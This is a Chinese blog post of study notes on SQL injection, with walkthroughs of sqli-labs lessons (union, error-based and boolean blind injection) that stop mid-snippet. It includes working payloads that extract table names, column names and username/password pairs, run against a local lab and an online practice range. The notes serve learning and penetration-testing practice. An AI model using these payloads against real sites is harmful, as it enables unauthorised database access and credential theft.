<!DOCTYPE html>
<html lang="en" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="John Doe" />
  <meta name="description" content="" />
  
  
  <title>
    
      SQL注入漏洞 
      
      
      |
    
     Hexo
  </title>

  
    <link rel="apple-touch-icon" href="/images/favicon.png">
    <link rel="icon" href="/images/favicon.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  
<link rel="stylesheet" href="/css/color-scheme.css">
<link rel="stylesheet" href="/css/base.css">
<link rel="stylesheet" href="/iconfont/iconfont.css">
<link rel="stylesheet" href="/css/github-markdown.css">
<link rel="stylesheet" href="/css/highlight.css">
<link rel="stylesheet" href="/css/comments.css">


  <!-- jquery3.3.1 -->
  <script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.min.js"></script>

  <!-- fancybox -->
  <link href="https://cdn.bootcss.com/fancybox/3.5.2/jquery.fancybox.min.css" rel="stylesheet">
  <script async src="https://cdn.bootcss.com/fancybox/3.5.2/jquery.fancybox.min.js"></script>
  
<script src="/js/fancybox.js"></script>


  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>

<meta name="generator" content="Hexo 6.0.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/avatar.png" alt="">
      
    </a>
    <div class="nickname"><a href="/">Oranges</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">Tags</a>
        </li>
      
        <li class="nav-item" data-path="/friends/">
          <a href="/friends/">Friends</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->

<!-- LaTex Display -->
<script src="https://polyfill.io/v3/polyfill.min.js?features=es6"></script>
<script type="text/javascript" id="MathJax-script" async
  src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-chtml.js">
</script>
<script>
MathJax = {
  tex: {
    inlineMath: [['$', '$'], ['\\(', '\\)']]
  }
};
</script>



  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">SQL注入漏洞</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime" title="Update time"></i>
          2023-09-17 20:54:03
        </span>
        
      </div>
      <div class="markdown-body">
        <h1 id="SQL注入（SQL-Injection）"><a href="#SQL注入（SQL-Injection）" class="headerlink" title="SQL注入（SQL Injection）"></a>SQL注入（SQL Injection）</h1><h2 id="定义（过程）"><a href="#定义（过程）" class="headerlink" title="定义（过程）"></a>定义（过程）</h2><p>将SQL代码插入或添加到用户的输入参数中</p>
<p>利用现有应用程序的特性，攻击者通过在Web表单、URL等用户可输入数据的地方插入恶意SQL语句，一并原有的SQL语句被代库执行。</p>
<p>也就是说，SQL命令就是前端应用程序和后端数据库之间的接口。</p>
<p>静态网页：html或htm，不存在交互，不存在SQL注入漏洞。</p>
<p>伪静态网页：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/1.png" alt></p>
<h2 id="形成原因"><a href="#形成原因" class="headerlink" title="形成原因"></a>形成原因</h2><p>1.数据与代码未严格分离</p>
<p>2.用户提交的参数数据未做充分检查过滤即被代入到SQL命令中，从而改变原有SQL命令的语义，且被数据库成功执行。</p>
<h2 id="常见过程"><a href="#常见过程" class="headerlink" title="常见过程"></a>常见过程</h2><p>1.客户端（发送请求）：用户请求URL，但用户对其中的参数值等数据进行修改</p>
<p>2.服务端：未对用户数据进行检验检查，直接把用户输入的语句代入SQL命令中，即已改变SQL命令语义。此时服务端会发至数据库引擎。</p>
<p>3.数据库引擎：未对SQL语句进行判别，直接执行修改后的SQL命令。执行后返回给服务端。</p>
<p>4.服务端：将注入结果返回给客户端。</p>
<p>5.客户端：得知响应结果，并根据上一次注入获取的敏感信息继续构造注入语句，注入其他信息。</p>
<h2 id="SQL-injection参数"><a href="#SQL-injection参数" class="headerlink" title="SQL injection参数"></a>SQL injection参数</h2><h2 id="在渗透测试过程中的作用"><a href="#在渗透测试过程中的作用" class="headerlink" title="在渗透测试过程中的作用"></a>在渗透测试过程中的作用</h2><p>如：</p>
<p>绕过登陆验证（使用万能密码登录网站后台）</p>
<p>获取敏感数据（比如网站管理员账号、密码等）</p>
<p>对文件系统进行操作（列出网站目录、读取敏感文件或写入文件）</p>
<p>注册表操作（读取、写入、删除注册表）</p>
<p>当权限比较大（系统管理员）便可以远程执行系统命令</p>
<h2 id="出现位置"><a href="#出现位置" class="headerlink" title="出现位置"></a>出现位置</h2><p>URL参数、HTTP包头（cookie、host参数等）、搜索框（登录框）、目录名、文件名等与数据库有交互关系的地方。当程序未对用户输入的数据进行有效的检查和过滤，直接代入SQL语句执行，此时便可能产生SQL注入漏洞。即最普遍的漏洞是由于参数值过滤不严导致的。</p>
<h2 id="SQL注入漏洞寻找方式"><a href="#SQL注入漏洞寻找方式" class="headerlink" title="SQL注入漏洞寻找方式"></a>SQL注入漏洞寻找方式</h2><p>1.使用工具：</p>
<p>优点：自动化、范围广、效率高；</p>
<p>缺点：误报、漏报，测试方法有限。</p>
<p>常用漏洞扫描工具：Safe3wvs、BurpSuite、Appscan、Acunetix WVS</p>
<p>2.手工测试</p>
<p>优点：测试方法灵活（写的时候已经固定）；</p>
<p>缺点：效率低、范围小，会因测试人员技术水平而异</p>
<h2 id="SQL注入漏洞判断依据"><a href="#SQL注入漏洞判断依据" class="headerlink" title="SQL注入漏洞判断依据"></a>SQL注入漏洞判断依据</h2><p>根据客户端（页面）返回的结果来判断提交的测试语句是否被数据库引擎执行。如果测试语句被代库执行，说明存在注入漏洞。故需要先构造测试语句。</p>
<h3 id="常见SQL测试语句"><a href="#常见SQL测试语句" class="headerlink" title="常见SQL测试语句"></a>常见SQL测试语句</h3><p>数字型：And 1 = 1</p>
<p>字符型：And ‘1’ = ‘1</p>
<h3 id="注释字符"><a href="#注释字符" class="headerlink" title="注释字符"></a>注释字符</h3><p>SQL Server和Oracle：</p>
<p>—用于单行注释</p>
<p>/<em> </em>/用于多行注释</p>
<p>Mysql：</p>
<p>除了以上两个注释符号，还有#用于单行注释</p>
<h2 id="实操过程"><a href="#实操过程" class="headerlink" title="实操过程"></a>实操过程</h2><p>手工：</p>
<p>1.拿到URL判断是否存在SQL注入，如：”and 1=1、and 1=2”</p>
<p>2.若返回正常界面，则初步判断当前URL存在SQL注入</p>
<p>3.执行基本测试语句，如判断属于哪个数据库、数据库版本、当前使用的数据库等</p>
<p>工具：</p>
<p>SQLmap</p>
<p>命令：sqlmap.py -u “URL地址” -p 指定注入参数</p>
<h2 id="知识点"><a href="#知识点" class="headerlink" title="知识点"></a>知识点</h2><p>搜索引擎命令</p>
<p>inurl：查找url中包含xxx的网页</p>
<h2 id="sqli-labs手工注入"><a href="#sqli-labs手工注入" class="headerlink" title="sqli-labs手工注入"></a>sqli-labs手工注入</h2><h3 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h3><p>（1）mysql数据库结构:</p>
<p>mysql数据库5.0以上版本有一个自带的数据库叫做information_schema，该数据库下面有两个表一个是tables和columns。</p>
<p>​    tables表：</p>
<p>​        table_name字段下面是所有数据库存在的表名</p>
<p>​        table_schema字段下是所有表名对应的数据库名</p>
<p>​    columns表：</p>
<p>​        colum_name字段下是所有数据库存在的字段名。</p>
<p>​        columns_schema字段下是所有表名对应的数据库。<br><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/2.png" style="zoom:67%;"></p>
<p>在如下目录中cmd，进入mysql：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/blog/source\_posts\SQL注入漏洞\21.png" alt></p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/22.png" alt></p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/23.png" alt></p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/24.png" style="zoom:67%;"></p>
<p>（2）SQL注入类型</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/4.png" style="zoom:67%;"></p>
<p>（3）联合查询</p>
<p>联合注入<strong>思路</strong>：</p>
<p>union联合</p>
<p>合并：将多条查询语句的结合并成一个结果，union注入攻击位一种手工测试。</p>
<p>联合注入<strong>步骤</strong>：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/3.png" style="zoom:67%;"></p>
<p>（4）其中空格编码为20%，’编码为27%\</p>
<h3 id="SQL注入类型——联合查询（Less-1，2，3，4）"><a href="#SQL注入类型——联合查询（Less-1，2，3，4）" class="headerlink" title="SQL注入类型——联合查询（Less-1，2，3，4）"></a>SQL注入类型——联合查询（Less-1，2，3，4）</h3><h4 id="Less-1"><a href="#Less-1" class="headerlink" title="Less-1"></a>Less-1</h4><p>登录靶场，目标找账号密码，第一关显示如下：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/5.png" alt></p>
<p>提示输入数字值的ID作为参数，输入?id=1</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/6.png" alt></p>
<p>为了显示方便，添加代码以便显示语句：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/7.png" alt></p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/8.png" alt></p>
<h5 id="first"><a href="#first" class="headerlink" title="first"></a>first</h5><p>一般都先在语句后加’，判断是否有sql注入，求闭合字符：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/9.png" alt></p>
<p>发现报错（界面变化），证明该网站和数据库确实有交互，进一步开始找漏洞</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/10.png" alt></p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/12.png" alt></p>
<p>and 1=1和and 1=2出现不同结果，说明闭合字符寻找正确，即为’</p>
<p>且因为该页面存在回显，所以我们可以使用联合查询</p>
<p>其中</p>
<p>and中若一方是false就报错</p>
<p>看源码便于理解：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/11.png" alt></p>
<p>在箭头处进行注入</p>
<h5 id="second"><a href="#second" class="headerlink" title="second"></a>second</h5><p>求列数</p>
<p>当为3时显示正常，为4时报错，即表示太多了，即确定为3列</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/18.png" alt></p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/19.png" alt></p>
<h5 id="third"><a href="#third" class="headerlink" title="third"></a>third</h5><p>联合查询求显示位</p>
<p>发现只显示id=1时的值，其他显示不出</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/20.png" alt></p>
<p>故修改命令，让其显示后面的内容：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/25.png" alt></p>
<h5 id="forth"><a href="#forth" class="headerlink" title="forth"></a>forth</h5><p>爆库——爆表——爆列——爆段</p>
<p>说明该网页使用security数据库：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/26.png" alt></p>
<p>看了表名不止一个，因此需要用连接符连接，from后跟表名存在的位置，这样查出了数据库中所有的表名：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/27.png" alt></p>
<p>故用where后跟条件(查表名，即条件为表存在哪个数据库中)，定位到security数据库：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="operator">/</span><span class="operator">/</span><span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span><span class="operator">/</span><span class="keyword">sql</span><span class="operator">/</span>less<span class="number">-1</span><span class="operator">/</span>?id<span class="operator">=</span><span class="number">-1</span> <span class="string">&#x27; union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=&#x27;</span>security<span class="string">&#x27;) --+</span></span><br></pre></td></tr></table></figure>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/28.png" alt></p>
<p>若未使用group_concat()：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/29.png" alt></p>
<p>用limit让其一个表一个表读（limit参数从0开始，后面一个参数’1’表示接下来显示1个表），此时显示：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/30.png" alt></p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/31.png" alt></p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/32.png" alt></p>
<p>把table改为column，加上限制条件（从users表中查）：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="operator">/</span><span class="operator">/</span><span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span><span class="operator">/</span><span class="keyword">sql</span><span class="operator">/</span>less<span class="number">-1</span><span class="operator">/</span>?id<span class="operator">=</span><span class="number">-1</span> <span class="string">&#x27; union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=&#x27;</span>security<span class="string">&#x27; and table_name=&#x27;</span>users<span class="string">&#x27;) --+</span></span><br></pre></td></tr></table></figure>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/33.png" alt></p>
<p>最后把column改为username、password，from users表中：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="operator">/</span><span class="operator">/</span><span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span><span class="operator">/</span><span class="keyword">sql</span><span class="operator">/</span>less<span class="number">-1</span><span class="operator">/</span>?id<span class="operator">=</span><span class="number">-1</span> <span class="string">&#x27; union select 1,2,(select group_concat(username,password) from users) --+</span></span><br></pre></td></tr></table></figure>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/34.png" alt></p>
<h4 id="Less-2"><a href="#Less-2" class="headerlink" title="Less-2"></a>Less-2</h4><p>提示显示同第一关，先加’，结果显示与数据库有交互</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/13.png" alt></p>
<p>输入and 1=1，发现结果报错，说明闭合字符有问题：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/14.png" alt></p>
<p>故去掉’，发现显示正常，说明不需要闭合字符，为数字型：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/15.png" alt></p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/16.png" alt></p>
<h4 id="Less-3"><a href="#Less-3" class="headerlink" title="Less-3"></a>Less-3</h4><p>提示显示同第一关，先加’，结果显示与数据库有交互</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/17.png" alt></p>
<h4 id="sql注入练习"><a href="#sql注入练习" class="headerlink" title="sql注入练习"></a>sql注入练习</h4><p><a target="_blank" rel="noopener" href="http://pu2lh35s.ia.aqlab.cn/">http://pu2lh35s.ia.aqlab.cn/</a></p>
<p>初始界面如下，仅一处可点：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/44.png" style="zoom:67%;"></p>
<p>点击后出现如下结果（正常页面）：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/45.png" style="zoom:50%;"></p>
<p>接着用’判断是否存在sql注入，发现页面发生变化（错误页面）：<br><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/46.png" style="zoom: 67%;"></p>
<p>继续测试，发现页面仍有问题，与预期不符，说明闭合方式错误：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/47.png" style="zoom:67%;"></p>
<p>说明为数字型：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/48.png" style="zoom:67%;"></p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/49.png" style="zoom:67%;"></p>
<p>测出类型后，测列数，说明两个字段有显示：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/50.png" style="zoom:67%;"></p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/51.png" style="zoom:67%;"></p>
<p>接下来测具体显示位（联合查询），此时页面没有信息，于是想让前面部分不输出：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/52.png" style="zoom:67%;"></p>
<p>找到信息2：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/53.png" style="zoom:67%;"></p>
<p>同理：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/54.png" style="zoom:67%;"></p>
<p>找到显示位后，先查数据库：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/55.png" style="zoom: 67%;"></p>
<p>接着查表：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="operator">/</span><span class="operator">/</span>pu2lh35s.ia.aqlab.cn<span class="operator">/</span>?id<span class="operator">=</span><span class="number">1</span> <span class="keyword">and</span> <span class="number">1</span><span class="operator">=</span><span class="number">2</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,(<span class="keyword">select</span> group_concat(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span><span class="string">&#x27;maoshe&#x27;</span>) <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/56.png" style="zoom:67%;"></p>
<p>接着查列：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="operator">/</span><span class="operator">/</span>pu2lh35s.ia.aqlab.cn<span class="operator">/</span>?id<span class="operator">=</span><span class="number">1</span> <span class="keyword">and</span> <span class="number">1</span><span class="operator">=</span><span class="number">2</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,(<span class="keyword">select</span> group_concat(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema<span class="operator">=</span><span class="string">&#x27;maoshe&#x27;</span> <span class="keyword">and</span> table_name<span class="operator">=</span><span class="string">&#x27;admin&#x27;</span>) <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/57.png" style="zoom:67%;"></p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/58.png" style="zoom:67%;"></p>
<h3 id="SQL注入类型——报错注入（Less-5，6）"><a href="#SQL注入类型——报错注入（Less-5，6）" class="headerlink" title="SQL注入类型——报错注入（Less-5，6）"></a>SQL注入类型——报错注入（Less-5，6）</h3><p>判断方法：</p>
<p>页面无回显位</p>
<p>常用报错函数E</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">updatexml()         是mysql对xml文档数据进行查询和修改的xpath函数</span><br><span class="line">extractvalue()      是mysql对xml文档数据进行查询的xpath函数</span><br><span class="line"><span class="built_in">floor</span>()             mysql中用来取整的函数</span><br><span class="line"><span class="built_in">exp</span>()               此函数返回e(自然对数的底)指数x的幂值</span><br></pre></td></tr></table></figure>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/35.png" alt></p>
<p>其中会用到0x7e（为波浪线的十六进制），作为标记，看是否完全显示完。</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/36.png" alt></p>
<p>报错注入步骤：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/37.png" style="zoom:67%;"></p>
<h4 id="Less-5"><a href="#Less-5" class="headerlink" title="Less-5"></a>Less-5</h4><h5 id="first-1"><a href="#first-1" class="headerlink" title="first"></a>first</h5><p>提示显示同第一关：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/38.png" alt></p>
<p>先加’，报错，说明存在交互：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/39.png" alt></p>
<p>继续测试：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/40.png" alt></p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/41.png" alt></p>
<p>第五关根据页面结果得知是字符型但和前四关不同。页面虽然有东西，但是只有对于请求对错出现不一样页面其余的就没有了，页面无回显位，考虑报错注入。</p>
<h5 id="second-1"><a href="#second-1" class="headerlink" title="second"></a>second</h5><p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/42.png" alt></p>
<p>或：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/43.png" alt></p>
<h3 id="SQL注入类型——布尔盲注-Less-8"><a href="#SQL注入类型——布尔盲注-Less-8" class="headerlink" title="SQL注入类型——布尔盲注(Less-8)"></a>SQL注入类型——布尔盲注(Less-8)</h3><p>判断方法：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/59.png" alt></p>
<p>操作步骤：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/60.png" alt></p>
<p>常用函数：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/61.png" alt></p>
<p>其中：substr的起始数字为1，括号中第一个数字x表示从第x位开始截取，第二个数字xx表示截取xx位。</p>
<p>区别limit的起始数字为0。</p>
<p>acsii对应：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/62.png" alt></p>
<h4 id="Less-8"><a href="#Less-8" class="headerlink" title="Less-8"></a>Less-8</h4><h5 id="first-求闭合字符"><a href="#first-求闭合字符" class="headerlink" title="first 求闭合字符"></a>first 求闭合字符</h5><p>起始界面是一样的，但是发现输入’之后没有报错信息，只是界面变化（You are in消失）（与Less-5不同）：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/64.png" alt></p>
<p>进行闭合字符检测：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/65.png" alt></p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/66.png" alt></p>
<p>说明’为闭合字符，且无显示位也无报错信息，确定为布尔盲注</p>
<h5 id="second-求数据库名长度length"><a href="#second-求数据库名长度length" class="headerlink" title="second 求数据库名长度length()"></a>second 求数据库名长度length()</h5><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">length((<span class="keyword">select</span> database()))</span><br></pre></td></tr></table></figure>
<p>一般数据库名没有太长（1-10），先用&gt;、&lt;，借助二分法缩小范围，再用=猜数</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/67.png" alt></p>
<h5 id="third-求数据库名的ascii值-substr"><a href="#third-求数据库名的ascii值-substr" class="headerlink" title="third 求数据库名的ascii值 substr"></a>third 求数据库名的ascii值 substr</h5><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">substr((<span class="keyword">select</span> database()),<span class="number">1</span>,<span class="number">1</span>)<span class="operator">=</span><span class="string">&#x27;s&#x27;</span></span><br><span class="line"></span><br><span class="line">ascii(substr((<span class="keyword">select</span> database()),<span class="number">1</span>,<span class="number">1</span>))<span class="operator">=</span><span class="number">115</span></span><br></pre></td></tr></table></figure>
<p>第二个数字表示截取位数，固定为1，太麻烦，故利用BP抓包爆破。</p>
<p>首先打开抓包：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/68.png" alt></p>
<p>抓到后，转到爆破模块（右键—&gt;Send to Intruder），通过返回的长度（正确界面和错误界面长度不同）确定结果：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/69.png" alt></p>
<p>设置payloads：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/70.png" style="zoom:67%;"></p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/73.png" style="zoom:67%;"></p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/74.png" alt></p>
<p>对应记录下来：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/71.png" style="zoom: 80%;"></p>
<p>找ascii：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/72.png" alt></p>
<h5 id="forth-求表的数量count"><a href="#forth-求表的数量count" class="headerlink" title="forth 求表的数量count()"></a>forth 求表的数量count()</h5><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> table_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span><span class="string">&#x27;security&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">select</span> <span class="built_in">count</span>(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span><span class="string">&#x27;security&#x27;</span></span><br><span class="line"></span><br><span class="line">id<span class="operator">=</span><span class="number">1</span> <span class="string">&#x27; and (select count(table_name) from information_schema.tables where table_schema=&#x27;</span>security<span class="string">&#x27;)=4 --+</span></span><br></pre></td></tr></table></figure>
<p>求出数量后便于遍历</p>
<h5 id="fifth-求表的长度"><a href="#fifth-求表的长度" class="headerlink" title="fifth 求表的长度"></a>fifth 求表的长度</h5><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"># 猜第一个表</span><br><span class="line"><span class="keyword">select</span> table_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span><span class="string">&#x27;security&#x27;</span> limit <span class="number">0</span>,<span class="number">1</span></span><br><span class="line"></span><br><span class="line"># 截取第一个表的第一个字母</span><br><span class="line">substr((<span class="keyword">select</span> table_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span><span class="string">&#x27;security&#x27;</span> limit <span class="number">0</span>,<span class="number">1</span>),<span 